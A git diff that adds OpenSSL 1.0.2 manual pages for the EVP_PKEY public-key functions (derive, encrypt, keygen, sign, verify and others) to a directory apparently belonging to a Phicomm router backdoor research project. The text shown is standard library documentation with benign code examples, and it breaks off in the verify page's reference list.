diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_derive.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_derive.pod
new file mode 100644
index 0000000..27464be
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_derive.pod
@@ -0,0 +1,93 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_derive_init, EVP_PKEY_derive_set_peer, EVP_PKEY_derive - derive public key algorithm shared secret.
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_derive_init(EVP_PKEY_CTX *ctx);
+ int EVP_PKEY_derive_set_peer(EVP_PKEY_CTX *ctx, EVP_PKEY *peer);
+ int EVP_PKEY_derive(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_derive_init() function initializes a public key algorithm
+context using key B<pkey> for shared secret derivation.
+
+The EVP_PKEY_derive_set_peer() function sets the peer key: this will normally
+be a public key.
+
+The EVP_PKEY_derive() derives a shared secret using B<ctx>.
+If B<key> is B<NULL> then the maximum size of the output buffer is written to
+the B<keylen> parameter. If B<key> is not B<NULL> then before the call the
+B<keylen> parameter should contain the length of the B<key> buffer, if the call
+is successful the shared secret is written to B<key> and the amount of data
+written to B<keylen>.
+
+=head1 NOTES
+
+After the call to EVP_PKEY_derive_init() algorithm specific control
+operations can be performed to set any appropriate parameters for the
+operation.
+
+The function EVP_PKEY_derive() can be called more than once on the same
+context if several operations are performed using the same parameters.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_derive_init() and EVP_PKEY_derive() return 1 for success and 0
+or a negative value for failure. In particular a return value of -2
+indicates the operation is not supported by the public key algorithm.
+
+=head1 EXAMPLE
+
+Derive shared secret (for example DH or EC keys):
+
+ #include <openssl/evp.h>
+ #include <openssl/rsa.h>
+
+ EVP_PKEY_CTX *ctx;
+ unsigned char *skey;
+ size_t skeylen;
+ EVP_PKEY *pkey, *peerkey;
+ /* NB: assumes pkey, peerkey have been already set up */
+
+ ctx = EVP_PKEY_CTX_new(pkey);
+ if (!ctx)
+	/* Error occurred */
+ if (EVP_PKEY_derive_init(ctx) <= 0)
+	/* Error */
+ if (EVP_PKEY_derive_set_peer(ctx, peerkey) <= 0)
+	/* Error */
+
+ /* Determine buffer length */
+ if (EVP_PKEY_derive(ctx, NULL, &skeylen) <= 0)
+	/* Error */
+
+ skey = OPENSSL_malloc(skeylen);
+
+ if (!skey)
+	/* malloc failure */
+ 
+ if (EVP_PKEY_derive(ctx, skey, &skeylen) <= 0)
+	/* Error */
+
+ /* Shared secret is skey bytes written to buffer skey */
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>,
+L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)>,
+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_encrypt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_encrypt.pod
new file mode 100644
index 0000000..6799ce1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_encrypt.pod
@@ -0,0 +1,99 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_encrypt_init, EVP_PKEY_encrypt - encrypt using a public key algorithm
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_encrypt_init(EVP_PKEY_CTX *ctx);
+ int EVP_PKEY_encrypt(EVP_PKEY_CTX *ctx,
+			unsigned char *out, size_t *outlen,
+			const unsigned char *in, size_t inlen);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_encrypt_init() function initializes a public key algorithm
+context using key B<pkey> for an encryption operation.
+
+The EVP_PKEY_encrypt() function performs a public key encryption operation
+using B<ctx>. The data to be encrypted is specified using the B<in> and
+B<inlen> parameters. If B<out> is B<NULL> then the maximum size of the output
+buffer is written to the B<outlen> parameter. If B<out> is not B<NULL> then
+before the call the B<outlen> parameter should contain the length of the
+B<out> buffer, if the call is successful the encrypted data is written to
+B<out> and the amount of data written to B<outlen>.
+
+=head1 NOTES
+
+After the call to EVP_PKEY_encrypt_init() algorithm specific control
+operations can be performed to set any appropriate parameters for the
+operation.
+
+The function EVP_PKEY_encrypt() can be called more than once on the same
+context if several operations are performed using the same parameters.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_encrypt_init() and EVP_PKEY_encrypt() return 1 for success and 0
+or a negative value for failure. In particular a return value of -2
+indicates the operation is not supported by the public key algorithm.
+
+=head1 EXAMPLE
+
+Encrypt data using OAEP (for RSA keys). See also L<PEM_read_PUBKEY(3)|pem(3)> or
+L<d2i_X509(3)|d2i_X509(3)> for means to load a public key. You may also simply
+set 'eng = NULL;' to start with the default OpenSSL RSA implementation:
+
+ #include <openssl/evp.h>
+ #include <openssl/rsa.h>
+ #include <openssl/engine.h>
+
+ EVP_PKEY_CTX *ctx;
+ ENGINE *eng;
+ unsigned char *out, *in;
+ size_t outlen, inlen; 
+ EVP_PKEY *key;
+ /* NB: assumes eng, key, in, inlen are already set up,
+  * and that key is an RSA public key
+  */
+ ctx = EVP_PKEY_CTX_new(key,eng);
+ if (!ctx)
+	/* Error occurred */
+ if (EVP_PKEY_encrypt_init(ctx) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_rsa_padding(ctx, RSA_OAEP_PADDING) <= 0)
+	/* Error */
+
+ /* Determine buffer length */
+ if (EVP_PKEY_encrypt(ctx, NULL, &outlen, in, inlen) <= 0)
+	/* Error */
+
+ out = OPENSSL_malloc(outlen);
+
+ if (!out)
+	/* malloc failure */
+ 
+ if (EVP_PKEY_encrypt(ctx, out, &outlen, in, inlen) <= 0)
+	/* Error */
+
+ /* Encrypted data is outlen bytes written to buffer out */
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>,
+L<engine(3)|engine(3)>,
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)>,
+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)> 
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_get_default_digest.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_get_default_digest.pod
new file mode 100644
index 0000000..8ff597d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_get_default_digest.pod
@@ -0,0 +1,41 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_get_default_digest_nid - get default signature digest
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+ int EVP_PKEY_get_default_digest_nid(EVP_PKEY *pkey, int *pnid);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_get_default_digest_nid() function sets B<pnid> to the default
+message digest NID for the public key signature operations associated with key
+B<pkey>.
+
+=head1 NOTES
+
+For all current standard OpenSSL public key algorithms SHA1 is returned.
+
+=head1 RETURN VALUES
+
+The EVP_PKEY_get_default_digest_nid() function returns 1 if the message digest
+is advisory (that is other digests can be used) and 2 if it is mandatory (other
+digests can not be used).  It returns 0 or a negative value for failure. In
+particular a return value of -2 indicates the operation is not supported by the
+public key algorithm.
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+
+=head1 HISTORY
+
+This function was first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_keygen.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_keygen.pod
new file mode 100644
index 0000000..fd431ac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_keygen.pod
@@ -0,0 +1,161 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_keygen_init, EVP_PKEY_keygen, EVP_PKEY_paramgen_init, EVP_PKEY_paramgen, EVP_PKEY_CTX_set_cb, EVP_PKEY_CTX_get_cb, EVP_PKEY_CTX_get_keygen_info, EVP_PKEVP_PKEY_CTX_set_app_data, EVP_PKEY_CTX_get_app_data - key and parameter generation functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_keygen_init(EVP_PKEY_CTX *ctx);
+ int EVP_PKEY_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey);
+ int EVP_PKEY_paramgen_init(EVP_PKEY_CTX *ctx);
+ int EVP_PKEY_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey);
+
+ typedef int EVP_PKEY_gen_cb(EVP_PKEY_CTX *ctx);
+
+ void EVP_PKEY_CTX_set_cb(EVP_PKEY_CTX *ctx, EVP_PKEY_gen_cb *cb);
+ EVP_PKEY_gen_cb *EVP_PKEY_CTX_get_cb(EVP_PKEY_CTX *ctx);
+
+ int EVP_PKEY_CTX_get_keygen_info(EVP_PKEY_CTX *ctx, int idx);
+
+ void EVP_PKEY_CTX_set_app_data(EVP_PKEY_CTX *ctx, void *data);
+ void *EVP_PKEY_CTX_get_app_data(EVP_PKEY_CTX *ctx);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_keygen_init() function initializes a public key algorithm
+context using key B<pkey> for a key genration operation.
+
+The EVP_PKEY_keygen() function performs a key generation operation, the 
+generated key is written to B<ppkey>.
+
+The functions EVP_PKEY_paramgen_init() and EVP_PKEY_paramgen() are similar
+except parameters are generated.
+
+The function EVP_PKEY_set_cb() sets the key or parameter generation callback
+to B<cb>. The function EVP_PKEY_CTX_get_cb() returns the key or parameter
+generation callback.
+
+The function EVP_PKEY_CTX_get_keygen_info() returns parameters associated
+with the generation operation. If B<idx> is -1 the total number of
+parameters available is returned. Any non negative value returns the value of
+that parameter. EVP_PKEY_CTX_gen_keygen_info() with a non-negative value for
+B<idx> should only be called within the generation callback.
+
+If the callback returns 0 then the key genration operation is aborted and an
+error occurs. This might occur during a time consuming operation where
+a user clicks on a "cancel" button.
+
+The functions EVP_PKEY_CTX_set_app_data() and EVP_PKEY_CTX_get_app_data() set
+and retrieve an opaque pointer. This can be used to set some application
+defined value which can be retrieved in the callback: for example a handle
+which is used to update a "progress dialog".
+
+=head1 NOTES
+
+After the call to EVP_PKEY_keygen_init() or EVP_PKEY_paramgen_init() algorithm
+specific control operations can be performed to set any appropriate parameters
+for the operation.
+
+The functions EVP_PKEY_keygen() and EVP_PKEY_paramgen() can be called more than
+once on the same context if several operations are performed using the same
+parameters.
+
+The meaning of the parameters passed to the callback will depend on the
+algorithm and the specifiic implementation of the algorithm. Some might not
+give any useful information at all during key or parameter generation. Others
+might not even call the callback.
+
+The operation performed by key or parameter generation depends on the algorithm
+used. In some cases (e.g. EC with a supplied named curve) the "generation"
+option merely sets the appropriate fields in an EVP_PKEY structure.
+
+In OpenSSL an EVP_PKEY structure containing a private key also contains the
+public key components and parameters (if any). An OpenSSL private key is
+equivalent to what some libraries call a "key pair". A private key can be used
+in functions which require the use of a public key or parameters.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_keygen_init(), EVP_PKEY_paramgen_init(), EVP_PKEY_keygen() and
+EVP_PKEY_paramgen() return 1 for success and 0 or a negative value for failure.
+In particular a return value of -2 indicates the operation is not supported by
+the public key algorithm.
+
+=head1 EXAMPLES
+
+Generate a 2048 bit RSA key:
+
+ #include <openssl/evp.h>
+ #include <openssl/rsa.h>
+
+ EVP_PKEY_CTX *ctx;
+ EVP_PKEY *pkey = NULL;
+ ctx = EVP_PKEY_CTX_new_id(EVP_PKEY_RSA, NULL);
+ if (!ctx)
+	/* Error occurred */
+ if (EVP_PKEY_keygen_init(ctx) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, 2048) <= 0)
+	/* Error */
+
+ /* Generate key */
+ if (EVP_PKEY_keygen(ctx, &pkey) <= 0)
+	/* Error */
+
+Generate a key from a set of parameters:
+
+ #include <openssl/evp.h>
+ #include <openssl/rsa.h>
+
+ EVP_PKEY_CTX *ctx;
+ EVP_PKEY *pkey = NULL, *param;
+ /* Assumed param is set up already */
+ ctx = EVP_PKEY_CTX_new(param);
+ if (!ctx)
+	/* Error occurred */
+ if (EVP_PKEY_keygen_init(ctx) <= 0)
+	/* Error */
+
+ /* Generate key */
+ if (EVP_PKEY_keygen(ctx, &pkey) <= 0)
+	/* Error */
+
+Example of generation callback for OpenSSL public key implementations:
+
+ /* Application data is a BIO to output status to */
+
+ EVP_PKEY_CTX_set_app_data(ctx, status_bio);
+
+ static int genpkey_cb(EVP_PKEY_CTX *ctx)
+	{
+	char c='*';
+	BIO *b = EVP_PKEY_CTX_get_app_data(ctx);
+	int p;
+	p = EVP_PKEY_CTX_get_keygen_info(ctx, 0);
+	if (p == 0) c='.';
+	if (p == 1) c='+';
+	if (p == 2) c='*';
+	if (p == 3) c='\n';
+	BIO_write(b,&c,1);
+	(void)BIO_flush(b);
+	return 1;
+	}
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>,
+L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)>,
+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)> 
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_new.pod
new file mode 100644
index 0000000..10687e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_new.pod
@@ -0,0 +1,47 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_new, EVP_PKEY_free - private key allocation functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ EVP_PKEY *EVP_PKEY_new(void);
+ void EVP_PKEY_free(EVP_PKEY *key);
+
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_new() function allocates an empty B<EVP_PKEY> 
+structure which is used by OpenSSL to store private keys.
+
+EVP_PKEY_free() frees up the private key B<key>.
+
+=head1 NOTES
+
+The B<EVP_PKEY> structure is used by various OpenSSL functions
+which require a general private key without reference to any
+particular algorithm.
+
+The structure returned by EVP_PKEY_new() is empty. To add a
+private key to this empty structure the functions described in
+L<EVP_PKEY_set1_RSA(3)|EVP_PKEY_set1_RSA(3)> should be used.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_new() returns either the newly allocated B<EVP_PKEY>
+structure of B<NULL> if an error occurred.
+
+EVP_PKEY_free() does not return a value.
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_set1_RSA(3)|EVP_PKEY_set1_RSA(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_print_private.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_print_private.pod
new file mode 100644
index 0000000..ce9d70d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_print_private.pod
@@ -0,0 +1,53 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_print_public, EVP_PKEY_print_private, EVP_PKEY_print_params - public key algorithm printing routines.
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_print_public(BIO *out, const EVP_PKEY *pkey,
+				int indent, ASN1_PCTX *pctx);
+ int EVP_PKEY_print_private(BIO *out, const EVP_PKEY *pkey,
+				int indent, ASN1_PCTX *pctx);
+ int EVP_PKEY_print_params(BIO *out, const EVP_PKEY *pkey,
+				int indent, ASN1_PCTX *pctx);
+
+=head1 DESCRIPTION
+
+The functions EVP_PKEY_print_public(), EVP_PKEY_print_private() and
+EVP_PKEY_print_params() print out the public, private or parameter components
+of key B<pkey> respectively. The key is sent to BIO B<out> in human readable
+form. The parameter B<indent> indicated how far the printout should be indented.
+
+The B<pctx> parameter allows the print output to be finely tuned by using
+ASN1 printing options. If B<pctx> is set to NULL then default values will
+be used.
+
+=head1 NOTES
+
+Currently no public key algorithms include any options in the B<pctx> parameter 
+parameter.
+
+If the key does not include all the components indicated by the function then
+only those contained in the key will be printed. For example passing a public
+key to EVP_PKEY_print_private() will only print the public components.
+
+=head1 RETURN VALUES
+
+These functions all return 1 for success and 0 or a negative value for failure.
+In particular a return value of -2 indicates the operation is not supported by
+the public key algorithm.
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_keygen(3)|EVP_PKEY_keygen(3)> 
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_set1_RSA.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_set1_RSA.pod
new file mode 100644
index 0000000..6f10175
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_set1_RSA.pod
@@ -0,0 +1,80 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_set1_RSA, EVP_PKEY_set1_DSA, EVP_PKEY_set1_DH, EVP_PKEY_set1_EC_KEY,
+EVP_PKEY_get1_RSA, EVP_PKEY_get1_DSA, EVP_PKEY_get1_DH, EVP_PKEY_get1_EC_KEY,
+EVP_PKEY_assign_RSA, EVP_PKEY_assign_DSA, EVP_PKEY_assign_DH, EVP_PKEY_assign_EC_KEY,
+EVP_PKEY_type - EVP_PKEY assignment functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_set1_RSA(EVP_PKEY *pkey,RSA *key);
+ int EVP_PKEY_set1_DSA(EVP_PKEY *pkey,DSA *key);
+ int EVP_PKEY_set1_DH(EVP_PKEY *pkey,DH *key);
+ int EVP_PKEY_set1_EC_KEY(EVP_PKEY *pkey,EC_KEY *key);
+
+ RSA *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
+ DSA *EVP_PKEY_get1_DSA(EVP_PKEY *pkey);
+ DH *EVP_PKEY_get1_DH(EVP_PKEY *pkey);
+ EC_KEY *EVP_PKEY_get1_EC_KEY(EVP_PKEY *pkey);
+
+ int EVP_PKEY_assign_RSA(EVP_PKEY *pkey,RSA *key);
+ int EVP_PKEY_assign_DSA(EVP_PKEY *pkey,DSA *key);
+ int EVP_PKEY_assign_DH(EVP_PKEY *pkey,DH *key);
+ int EVP_PKEY_assign_EC_KEY(EVP_PKEY *pkey,EC_KEY *key);
+
+ int EVP_PKEY_type(int type);
+
+=head1 DESCRIPTION
+
+EVP_PKEY_set1_RSA(), EVP_PKEY_set1_DSA(), EVP_PKEY_set1_DH() and
+EVP_PKEY_set1_EC_KEY() set the key referenced by B<pkey> to B<key>.
+
+EVP_PKEY_get1_RSA(), EVP_PKEY_get1_DSA(), EVP_PKEY_get1_DH() and
+EVP_PKEY_get1_EC_KEY() return the referenced key in B<pkey> or
+B<NULL> if the key is not of the correct type.
+
+EVP_PKEY_assign_RSA(), EVP_PKEY_assign_DSA(), EVP_PKEY_assign_DH()
+and EVP_PKEY_assign_EC_KEY() also set the referenced key to B<key>
+however these use the supplied B<key> internally and so B<key>
+will be freed when the parent B<pkey> is freed.
+
+EVP_PKEY_type() returns the type of key corresponding to the value
+B<type>. The type of a key can be obtained with
+EVP_PKEY_type(pkey->type). The return value will be EVP_PKEY_RSA,
+EVP_PKEY_DSA, EVP_PKEY_DH or EVP_PKEY_EC for the corresponding
+key types or NID_undef if the key type is unassigned.
+
+=head1 NOTES
+
+In accordance with the OpenSSL naming convention the key obtained
+from or assigned to the B<pkey> using the B<1> functions must be
+freed as well as B<pkey>.
+
+EVP_PKEY_assign_RSA(), EVP_PKEY_assign_DSA(), EVP_PKEY_assign_DH()
+and EVP_PKEY_assign_EC_KEY() are implemented as macros.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_set1_RSA(), EVP_PKEY_set1_DSA(), EVP_PKEY_set1_DH() and
+EVP_PKEY_set1_EC_KEY() return 1 for success or 0 for failure.
+
+EVP_PKEY_get1_RSA(), EVP_PKEY_get1_DSA(), EVP_PKEY_get1_DH() and
+EVP_PKEY_get1_EC_KEY() return the referenced key or B<NULL> if 
+an error occurred.
+
+EVP_PKEY_assign_RSA(), EVP_PKEY_assign_DSA(), EVP_PKEY_assign_DH()
+and EVP_PKEY_assign_EC_KEY() return 1 for success and 0 for failure.
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_new(3)|EVP_PKEY_new(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_sign.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_sign.pod
new file mode 100644
index 0000000..21974b4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_sign.pod
@@ -0,0 +1,106 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_sign_init, EVP_PKEY_sign - sign using a public key algorithm
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_sign_init(EVP_PKEY_CTX *ctx);
+ int EVP_PKEY_sign(EVP_PKEY_CTX *ctx,
+			unsigned char *sig, size_t *siglen,
+			const unsigned char *tbs, size_t tbslen);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_sign_init() function initializes a public key algorithm
+context using key B<pkey> for a signing operation.
+
+The EVP_PKEY_sign() function performs a public key signing operation
+using B<ctx>. The data to be signed is specified using the B<tbs> and
+B<tbslen> parameters. If B<sig> is B<NULL> then the maximum size of the output
+buffer is written to the B<siglen> parameter. If B<sig> is not B<NULL> then
+before the call the B<siglen> parameter should contain the length of the
+B<sig> buffer, if the call is successful the signature is written to
+B<sig> and the amount of data written to B<siglen>.
+
+=head1 NOTES
+
+EVP_PKEY_sign() does not hash the data to be signed, and therefore is
+normally used to sign digests. For signing arbitrary messages, see the
+L<EVP_DigestSignInit(3)|EVP_DigestSignInit(3)> and
+L<EVP_SignInit(3)|EVP_SignInit(3)> signing interfaces instead.
+
+After the call to EVP_PKEY_sign_init() algorithm specific control
+operations can be performed to set any appropriate parameters for the
+operation (see L<EVP_PKEY_CTX_ctrl(3)|EVP_PKEY_CTX_ctrl(3)>).
+
+The function EVP_PKEY_sign() can be called more than once on the same
+context if several operations are performed using the same parameters.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_sign_init() and EVP_PKEY_sign() return 1 for success and 0
+or a negative value for failure. In particular a return value of -2
+indicates the operation is not supported by the public key algorithm.
+
+=head1 EXAMPLE
+
+Sign data using RSA with PKCS#1 padding and SHA256 digest:
+
+ #include <openssl/evp.h>
+ #include <openssl/rsa.h>
+
+ EVP_PKEY_CTX *ctx;
+ /* md is a SHA-256 digest in this example. */
+ unsigned char *md, *sig;
+ size_t mdlen = 32, siglen;
+ EVP_PKEY *signing_key;
+
+ /*
+  * NB: assumes signing_key and md are set up before the next
+  * step. signing_key must be an RSA private key and md must
+  * point to the SHA-256 digest to be signed.
+  */
+ ctx = EVP_PKEY_CTX_new(signing_key, NULL /* no engine */);
+ if (!ctx)
+	/* Error occurred */
+ if (EVP_PKEY_sign_init(ctx) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_rsa_padding(ctx, RSA_PKCS1_PADDING) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_signature_md(ctx, EVP_sha256()) <= 0)
+	/* Error */
+
+ /* Determine buffer length */
+ if (EVP_PKEY_sign(ctx, NULL, &siglen, md, mdlen) <= 0)
+	/* Error */
+
+ sig = OPENSSL_malloc(siglen);
+
+ if (!sig)
+	/* malloc failure */
+ 
+ if (EVP_PKEY_sign(ctx, sig, &siglen, md, mdlen) <= 0)
+	/* Error */
+
+ /* Signature is siglen bytes written to buffer sig */
+
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_CTX_ctrl(3)|EVP_PKEY_CTX_ctrl(3)>,
+L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>,
+L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)> 
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_verify.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_verify.pod
new file mode 100644
index 0000000..90612ba
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_verify.pod
@@ -0,0 +1,91 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_verify_init, EVP_PKEY_verify - signature verification using a public key algorithm
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_verify_init(EVP_PKEY_CTX *ctx);
+ int EVP_PKEY_verify(EVP_PKEY_CTX *ctx,
+			const unsigned char *sig, size_t siglen,
+			const unsigned char *tbs, size_t tbslen);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_verify_init() function initializes a public key algorithm
+context using key B<pkey> for a signature verification operation.
+
+The EVP_PKEY_verify() function performs a public key verification operation
+using B<ctx>. The signature is specified using the B<sig> and
+B<siglen> parameters. The verified data (i.e. the data believed originally
+signed) is specified using the B<tbs> and B<tbslen> parameters.
+
+=head1 NOTES
+
+After the call to EVP_PKEY_verify_init() algorithm specific control
+operations can be performed to set any appropriate parameters for the
+operation.
+
+The function EVP_PKEY_verify() can be called more than once on the same
+context if several operations are performed using the same parameters.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_verify_init() and EVP_PKEY_verify() return 1 if the verification was
+successful and 0 if it failed. Unlike other functions the return value 0 from
+EVP_PKEY_verify() only indicates that the signature did not not verify
+successfully (that is tbs did not match the original data or the signature was
+of invalid form) it is not an indication of a more serious error.
+
+A negative value indicates an error other that signature verification failure.
+In particular a return value of -2 indicates the operation is not supported by
+the public key algorithm.
+
+=head1 EXAMPLE
+
+Verify signature using PKCS#1 and SHA256 digest:
+
+ #include <openssl/evp.h>
+ #include <openssl/rsa.h>
+
+ EVP_PKEY_CTX *ctx;
+ unsigned char *md, *sig;
+ size_t mdlen, siglen; 
+ EVP_PKEY *verify_key;
+ /* NB: assumes verify_key, sig, siglen md and mdlen are already set up
+  * and that verify_key is an RSA public key
+  */
+ ctx = EVP_PKEY_CTX_new(verify_key);
+ if (!ctx)
+	/* Error occurred */
+ if (EVP_PKEY_verify_init(ctx) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_rsa_padding(ctx, RSA_PKCS1_PADDING) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_signature_md(ctx, EVP_sha256()) <= 0)
+	/* Error */
+
+ /* Perform operation */
+ ret = EVP_PKEY_verify(ctx, sig, siglen, md, mdlen);
+
+ /* ret == 1 indicates success, 0 verify failure and < 0 for some
+  * other error.
+  */
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>,
+L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)>,
